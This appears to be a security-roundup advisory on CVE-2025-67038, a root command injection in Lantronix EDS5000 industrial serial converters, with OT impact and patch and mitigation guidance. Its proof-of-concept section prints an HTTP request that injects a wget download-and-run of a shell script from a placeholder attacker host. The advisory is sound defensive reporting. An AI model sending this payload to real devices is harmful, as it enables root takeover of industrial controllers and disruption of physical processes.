CVE-2025-67038: Lantronix EDS5000 CVSS 9.8 Code Injection — CISA KEV, ICS/OT Alert, Federal Deadline Today

CISA issues urgent warning over critical CVSS 9.8 code injection in Lantronix industrial serial converters.

CVE-2025-67038: Lantronix EDS5000 CVSS 9.8 Code Injection — CISA KEV, ICS/OT Alert, Federal Deadline Today

This post is part of the Week of June 26, 2026 Security Roundup.

Vulnerability Overview

CVE-2025-67038 is a critical code injection vulnerability (CWE-94) in the Lantronix EDS5000 Series — a serial-to-Ethernet converter widely deployed in industrial automation, operational technology (OT), and ICS environments. CVSS score: 9.8 Critical. CISA added it to the Known Exploited Vulnerabilities (KEV) catalog on June 23, 2026, with a federal agency remediation deadline of June 26, 2026 (today).

CVE: CVE-2025-67038 | CVSS: 9.8 Critical | CISA KEV: June 23, 2026 | FCEB Deadline: June 26, 2026

Technical Details

The Lantronix EDS5000 is a serial device server that allows serial-connected industrial equipment (PLCs, sensors, meters, robots) to be accessed and managed remotely over Ethernet. The vulnerability exists in the device's HTTP RPC module: when processing authentication attempts, the module takes the username parameter and concatenates it directly into a shell command for logging failed authentication events — without any sanitization. An attacker can inject OS metacharacters into the username field to execute arbitrary root commands, without needing valid credentials.

Proof-of-Concept Attack

POST /auth HTTP/1.1
Host: <target-ip>
Content-Type: application/x-www-form-urlencoded

username=admin%3Bwget+http%3A%2F%2F<attacker-ip>%2Fshell.sh+-O+%2Ftmp%2Fs%3Bash+%2Ftmp%2Fs%26&password=x

The shell command injected via the username parameter runs as root, enabling: downloading and executing payloads, establishing reverse shells, modifying device configuration to relay attacker traffic, pivoting to air-gapped OT/ICS networks reachable only via the serial-connected devices.

OT/ICS Impact

The EDS5000's role as a serial-to-Ethernet bridge makes this vulnerability particularly dangerous in OT environments. Compromising an EDS5000 can give attackers:

  • Direct command and control over serial-connected PLCs, RTUs, and industrial controllers
  • Ability to manipulate sensor readings fed to SCADA systems
  • A pivot point into otherwise air-gapped control networks
  • Potential for physical process disruption in manufacturing, utilities, and critical infrastructure

CISA specifically noted the potential for "loss or denial of control over industrial or automation assets" through manipulation of vulnerable devices.

Affected Versions and Fix

All Lantronix EDS5000 Series devices prior to firmware version 2.2.0.0R1. Lantronix released the fix and recommends immediate upgrade to EDS5000 version 2.2.0.0R1. Contact Lantronix support if automatic update mechanisms are unavailable in your OT environment.

Remediation

  • Apply patch immediately: Upgrade to Lantronix EDS5000 firmware version 2.2.0.0R1.
  • Network segmentation: Ensure EDS5000 management interfaces are not exposed to untrusted networks. Place them behind a firewall or jump server that restricts access to trusted IP ranges only.
  • Disable HTTP management interface if not required — use SSH or physical console access instead.
  • Inventory exposure: Search Shodan for product:"Lantronix EDS5000" to identify internet-exposed instances in your organization.
  • If patching is not immediately possible in your OT environment, isolate the device from external network access as an emergency mitigation.
  • Monitor for IOCs: Unexpected outbound connections, configuration changes, or unusual authentication log entries on EDS5000 devices.

← Back to the Security Roundup: Week of June 26, 2026

Read more

Brecha de Datos Médicos en Photon Health

Filtración en Photon Health: Zero-Day de Inyección SQL en Metabase Expone Recetas Médicas de Pacientes

📌Security Roundup Series: Semana del 9 de Octubre de 2026 • 4 min read deep dive🏛️Incident Overview: Target / Organization: Photon Health, Inc. (Plataforma de Prescripción Médica Digital) Threat Actor / Attribution: Actor Desconocido (Extorsión Financiera) Impact / Records Compromised: Nombres de pacientes, direcciones, números de teléfono, fechas de nacimiento, recetas médicas completas

By James Luther